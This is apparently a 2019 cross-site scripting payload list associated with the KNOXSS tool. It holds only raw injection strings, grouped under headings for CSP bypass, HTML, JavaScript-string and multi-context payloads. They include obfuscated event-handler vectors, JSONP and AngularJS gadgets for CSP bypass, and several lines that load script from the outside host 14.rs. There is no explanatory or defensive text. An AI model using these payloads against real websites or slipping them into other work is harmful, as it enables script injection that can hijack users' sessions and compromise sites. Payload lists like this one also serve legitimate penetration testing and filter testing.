XSS payload  2019 (KNOXSS)

List of  CSP 

'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /K>confirm`1`</Script/>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script Src=Data:,confirm`1`>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /Src=Data:,confirm`1`></Script/>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /Src=?callback=confirm`1`//></Script/>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /Src=/api.json?callback=confirm`1`//></Script/>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /Src=/api/api.json?callback=confirm`1`//></Script/>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /Src=/cart.json?callback=confirm`1`//></Script/>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /Src=/api/cart.json?callback=confirm`1`//></Script/>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /Src=/cart/add.json?callback=confirm`1`//></Script/>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /Src=/search.json?callback=confirm`1`//></Script/>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /Src=/api/search.json?callback=confirm`1`//></Script/>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /Src=https:ajax.googleapis.com/ajax/libs/angularjs/1.1.3/angular.min.js></Script/><B /Style=position:fixed;top:0;left:0;font-size:999px%0C/Ng-App /Ng-Csp /Ng-Mouseenter=$event.view.confirm(1)>___
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Style /Type=text/less>k{n:`function(){confirm(1)}()`}</Style/><Script /Src=https:cdnjs.cloudflare.com/ajax/libs/less.js/2.7.1/less.min.js></Script/>

List  of  HTML 

'"--!><Script /K/Src=https:@14.rs>confirm%601%60</Script/K>
'"--!><Script /K/>confirm`1`</Script /K/>
"--!><Svg/Onload=confirm`1`>"
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm`1`>
'"--!><Image%0CSrcset=.%0COnerror=confirm%601%60 //
'"--!>%25%75003CSvg /%25%753008Svg /%25%75FF1CSvg /Onload=confirm`1` //
'"--!><Input /Autofocus /Onfocus=confirm`1` //
'" /Autof<K>ocus /O<K>nfocus=confirm`1` //
'"--!><Body /Onpageshow=confirm`1`>
'"--!><Svg><Set /Onbegin=confirm`1`>
"'--!><Html/Onmouseenter=confirm`1`//>"
'" /Style=position:fixed;top:0;left:0;font-size:999px; /Onmouseenter=confirm`1` //
'"--!><K /Onbeforescriptexecute=confirm`1` //
'"--!><Svg><Script /Xlink:Href=Data:,confirm`1` />
'"--!><Object /Data=JavaS%26%2399ript:confirm`1`>
'"--!></Iframe><Iframe /SrcDoc=%26lt;Svg/O%26%23x6Eload%26equals;confirm%26lpar;1%26rpar;%26gt;>
'"--!><Base /Href=https:@14.rs>
'"--!><K:script xmlns:K="http://www.w3.org/1999/xhtml">confirm`1`</K:script>
'"--!><K /Ng-App>{{a="".constructor.prototype;a.charAt=a.trim;$eval("a,confirm`1`,b")}}
'"--!><<!--%23set%20var="x"value="svg /o"var="y"value="nload=confirm`1`"--><!--%23echo%20var="x"var="y"-->>

List of  JS 

'-confirm`1`-'
1'?confirm`1`:'
'-top['con\x66irm']`1`-'
1'?top['con\x66irm']`1`:'
'-[location='Javas\x63ript:confirm%25281%2529']-'
1'?location='Javas\x63ript:confirm%25281%2529':'
'-[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\143\157\156\146\151\162\155\50\61\51')()-'
'?[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\143\157\156\146\151\162\155\50\61\51')():'

"-confirm`1`-"
1"?confirm`1`:"
"-top["con\x66irm"]`1`-"
1"?top["con\x66irm"]`1`:"
"-[location="Javas\x63ript:confirm%25281%2529"]-"
1"?location="Javas\x63ript:confirm%25281%2529":"
"-[]["\146\151\154\164\145\162"]["\143\157\156\163\164\162\165\143\164\157\162"]("\143\157\156\146\151\162\155\50\61\51")()-"
"?[]["\146\151\154\164\145\162"]["\143\157\156\163\164\162\165\143\164\157\162"]("\143\157\156\146\151\162\155\50\61\51")():"

\'-confirm`1`//
\'-confirm`1`<!--
\'-confirm`1`%0A-->
\'-confirm`1`}//
\'-confirm`1`}<!--
\'-confirm`1`}%0A-->
\'-confirm`1`,//
\'-confirm`1`,<!--
\'-confirm`1`,%0A-->
\'-confirm`1`};k={//
\'-confirm`1`};k={<!--
\'-confirm`1`};k={%0A-->
\'}confirm`1`;k:{//
\'}confirm`1`;k:{<!--
\'}confirm`1`;k:{%0A-->
\'}confirm`1`?0:function k(){//
\'}confirm`1`?0:function k(){<!--
\'}confirm`1`?0:function k(){%0A-->

\"-confirm`1`//
\"-confirm`1`<!--
\"-confirm`1`%0A-->
\"-confirm`1`}//
\"-confirm`1`}<!--
\"-confirm`1`}%0A-->
\"-confirm`1`,//
\"-confirm`1`,<!--
\"-confirm`1`,%0A-->
\"-confirm`1`};k={//
\"-confirm`1`};k={<!--
\"-confirm`1`};k={%0A-->
\"}confirm`1`;k:{//
\"}confirm`1`;k:{<!--
\"}confirm`1`;k:{%0A-->
\"}confirm`1`?0:function k(){//
\"}confirm`1`?0:function k(){<!--
\"}confirm`1`?0:function k(){%0A-->

'"--!></Script%0C><Script/Src=https:14.rs>
'"--!></Script/><Svg/Onload=confirm`1`//

List of  Multi


"><svg/onload=alert(/1/)>
</script><script>a lert(/1/)</script>
<!'/*!"/*!\'/*\"/*--!><Input/Autofocus/%0D*/Onfocus=confirm%601%60//><Svg>
"--!><Svg/Onload=confirm`1`>"
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm`1`>
'"--!><Script /K/>confirm`1`//</Script /K/><!--
'"--!><Image%0CSrcset=.%0COnerror=confirm%601%60 //
'"--!>%25%75003CSvg /%25%753008Svg /%25%75FF1CSvg /Onload=confirm`1` //
'" /Autof<K>ocus /O<K>nfocus=confirm`1` //
'"--!><Body /Onpageshow=confirm`1`>
'"--!><Svg><Set /Onbegin=confirm`1`>
"'--!><Html/Onmouseenter=confirm`1`//>"
'" /Style=position:fixed;top:0;left:0;font-size:999px; /Onmouseenter=confirm`1` //
'"--!><K /Onbeforescriptexecute=confirm`1` //
'"--!><Svg><Script /Xlink:Href=https:@14.rs /> 
'"--!><Object /Data=JavaS%26%2399ript:confirm`1`>
'"--!></Iframe><Iframe /SrcDoc=%26lt;Svg/O%26%23x6Eload%26equals;confirm%26lpar;1%26rpar;%26gt;>
'"--!><Base /Href=https:@14.rs>
<!'/*!"/*\'/*\"/**/-top[`con\x66irm`]`1`//><svg>
<!'/*!"/*\'/*\"/**/-[location=`Javas\x63ript:confirm%25281%2529`]//><svg>
<!'/*!"/*\'/*\"/**/-[][`\146\151\154\164\145\162`][`\143\157\156\163\164\162\165\143\164\157\162`](`\143\157\156\146\151\162\155\50\61\51`)()//><svg>
<!'/*!"/*\'/*\"/**/-confirm`1`,//><svg>
<!'/*!"/*\'/*\"/**/-confirm`1`};//><svg>
"-confirm(/1/)-"
<!'/*!"/*\'/*\"/**/}confirm`1`;k:{//><svg>
<!'/*!"/*\'/*\"/**/}confirm`1`?0:function k(){//><svg>
